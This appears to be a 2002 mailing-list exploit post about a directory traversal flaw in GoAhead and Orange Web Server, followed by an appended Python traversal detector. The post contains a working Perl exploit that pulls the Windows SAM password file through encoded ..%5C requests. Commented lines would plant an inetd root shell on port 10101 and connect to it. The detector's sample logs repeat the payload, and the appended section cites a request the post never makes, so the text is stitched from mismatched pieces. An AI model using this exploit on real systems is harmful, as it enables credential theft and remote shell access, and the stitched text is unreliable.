OSEC

 
xile_at_hushmail.com
Date: Wed Jul 17 2002 - 10:17:22 CDT


    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    Have been aware for some time and I just wanted to add a little to
    Mr. Moore's observations:

    Title: GoAhead Web Server Directory Traversal + Cross Site Scripting

    >Also Affected: Orange Web Server - all versions

    Risk Rating: Medium

    >escalated to risk: high - password hash pilfer via 300 year old
    >traversal technique

    Software: GoAhead Web Server v2.1
    <added Orange Web Server - All
    <Orange Web Server uses GoAhead WebServer 2.1 technology so it is
    <powerful and stable. - nuff said

    Platforms: Windows NT/98/95/CE
                Embedded Linux
                Linux
                QNX
                Novell Netware + others

    <ADDED: Hard Hat Linux - started
    <bundling GoAhead with their distros, so there should be palm
    <pilots, cellphones and all kinds of nifty prototype devices
    <running this sad-ware

    #!/usr/bin/perl
    # spawns a shell on port 10101
    use IO::Socket;
    # test the argument array @ARGV (a bare ARGV is a filehandle, not a count)
    if (@ARGV < 1) { print "usage: perl go-orange.pl [host]\n"; exit; }
    $host = $ARGV[0];

    $shell = IO::Socket::INET->new( PeerAddr=>"$host",
     PeerPort=>"80",
     Proto=>"tcp") || die "Connection failed.\n";

    #dump sam is success on Orange and GoAhead!- was able to jump around
    #and do interesting things with encoding 0-day
    #%77innt/s%79s%74em%332/%63%6D%64.%65x%65?/c%25%32%30ech%6O%%320W%65

    # %5C is a URL-encoded backslash, which the server treats as a path separator
    print $shell "GET /..%5C..%5C..%5C..%5C..%5C..%5C/winnt/repair/sam HTTP/1.0\n\n";

    ##################################################################
    #commented out hypothetical embedded webserver in transmeta-maytag
    #stove scenario. Will leave hand held device ( game boy) format vuln
    #testing to experts at Non-profit .org's
    # Only testbeds I saw were win32 ( I only looked for 10 #minutes)

    #print $shell "GET
    #/..%5C..%5C..%5C..%5C..%5C..%5C/bin/echo%20\"10101%20stream%20tcp%2
    #0nowait%20root%20/bin/sh%20-i\"%20>>%20/tmp/inet|
    #HTTP/1.0\n\n";

    # we get signal again
    #$shell = IO::Socket::INET->new( PeerAddr=>"$host",
    #PeerPort=>"80",
    #Proto=>"tcp") || die "fuq, we no get signal.\n";

    #print $shell "GET
    #/..%5C..%5C..%5C..%5C..%5C..%5C/usr/sbin/inetd%20/tmp/inet|
    #HTTP/1.0\n\n";

    sleep 1;

    print "handheld haqrz connect to $host on port 10101...";
    system("telnet $host 10101");

    - - xile
    -----BEGIN PGP SIGNATURE-----
    Version: Hush 2.1
    Note: This signature can be verified at https://www.hushtools.com

    wlkEARECABkFAj01ioASHHhpbGVAaHVzaG1haWwuY29tAAoJEBnsRZrmhGsJapUAnRCE
    Mg4OfVISUBrPgWxFcbW2mK6XAJ4/xxmJInaJRv/YqC45ki6wYPOPbA==
    =IKhW
    -----END PGP SIGNATURE-----

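A defensive counterpart to the request in the post above, added here as an example that is not part of xile's message or of the GoAhead project: a Python path resolver that percent-decodes to a fixed point (so double-encoded `%252e` cannot slip past a single-pass check), treats an encoded `%5C` backslash as a separator the way the Windows-hosted server did, and refuses any request that would climb above the document root, plus a small scanner that applies the same check to access-log lines. The document root, the log lines and the function names are assumptions constructed for this example.

```python
import posixpath
from urllib.parse import unquote

# Assumed document root (constructed for this example).
DOCROOT = "/var/www/htdocs"


def fully_decode(path, max_rounds=3):
    """Percent-decode until the string stops changing.

    A single unquote() pass turns %252e into %2e, not into '.', so a
    one-shot check would pass a double-encoded '..' through to the file
    system.  Anything still changing after max_rounds is treated as hostile.
    """
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            return decoded
        path = decoded
    raise ValueError("percent-encoding nested more than %d deep" % max_rounds)


def resolve_request_path(request_path, docroot=DOCROOT):
    """Map a raw request path onto the file system under docroot.

    Returns the resolved path, or None when the request would climb above
    docroot.  Backslashes are treated as separators because the Windows
    hosted server in the advisory honoured an encoded %5C as one.
    """
    raw = request_path.split("?", 1)[0]          # query string is not a path
    try:
        decoded = fully_decode(raw)
    except ValueError:
        return None
    if "\x00" in decoded:                        # NUL would truncate a C path
        return None
    stack = []
    for seg in decoded.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not stack:
                return None                      # would leave docroot
            stack.pop()
        else:
            stack.append(seg)
    return posixpath.join(docroot, *stack)


def flag_traversal_requests(log_lines):
    """Return the request paths in access-log lines that resolve_request_path rejects."""
    flagged = []
    for line in log_lines:
        try:
            request = line.split('"')[1]         # e.g. GET /path HTTP/1.0
            path = request.split()[1]
        except IndexError:
            continue
        if resolve_request_path(path) is None:
            flagged.append(path)
    return flagged


# Constructed access-log lines in common log format; the second and third
# carry the encoded traversal from the post, single- and double-encoded.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Jul/2002:10:17:22 -0500] "GET /index.htm HTTP/1.0" 200 1432',
    '10.0.0.5 - - [17/Jul/2002:10:17:23 -0500] "GET /..%5C..%5C..%5C..%5C..%5C..%5C/winnt/repair/sam HTTP/1.0" 200 24576',
    '10.0.0.5 - - [17/Jul/2002:10:17:24 -0500] "GET /images/..%252f..%252f..%252fwinnt/repair/sam HTTP/1.0" 404 210',
    '10.0.0.5 - - [17/Jul/2002:10:17:25 -0500] "GET /docs/../index.htm HTTP/1.0" 200 1432',
]

if __name__ == "__main__":
    for hit in flag_traversal_requests(SAMPLE_LOG):
        print("traversal attempt:", hit)
```

The resolver deliberately does not use `os.path.normpath`, which silently clamps leading `..` segments at `/` and would hide the attempt instead of reporting it; walking the segments with an explicit stack lets the same function serve both as the server-side guard and as the detection rule run over logs.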